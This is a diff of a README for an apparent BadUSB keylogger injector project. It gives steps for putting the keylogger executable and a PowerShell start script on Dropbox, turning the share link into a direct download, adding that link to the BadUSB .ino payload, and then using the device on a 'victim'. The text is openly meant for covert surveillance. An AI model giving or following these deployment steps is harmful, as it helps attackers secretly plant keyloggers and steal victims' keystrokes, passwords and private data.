tuconnaisyouknow/BadUSB_keyloggerInjector/README.md

 5. Replace link [here](https://github.com/tuconnaisyouknow/BadUSB_keyloggerInjector/blob/main/keylogger.ino) with keylogger.exe link at line 93;

-6. Put the .ino or .txt script in your BadUSB;
+6. Put the .ino or .txt file in your BadUSB;

 7. Find a victim and enjoy !
 ## Requirments for victim PC
 * Turn off caps lock.
 * Switch the keyboard layout to French (or adapt the code according to your layout).
 # How to set a link for wget the script ⬇️
-Remember to upload first keylogger.exe file to add its link to startSrcipt.ps1 file.
+Remember to upload first keylogger.exe file to add its link into the startSrcipt.ps1 file.
 ## Dropbox
 1. Create a dropbox account [here](https://www.dropbox.com);

-2. Upload startScript.ps1 and keylogger.exe;
+2. Upload your file;

-3. Copy the link of the file and change ?dl=0 by ?raw=1;
+3. Copy the link of the file and change ?dl=0 by ?dl=1;

-4. The link will be like this : https://dropbox.com/s/link/startScript.ps1?raw=1;
+4. You will get a link like this : https://dropbox.com/s/link/YOURFILE?dl=1;

 5. Now put these link in the [keylogger.ino](https://github.com/tuconnaisyouknow/BadUSB_keyloggerInjector/blob/main/BadUSB_keylogger.ino) file;
 ## Github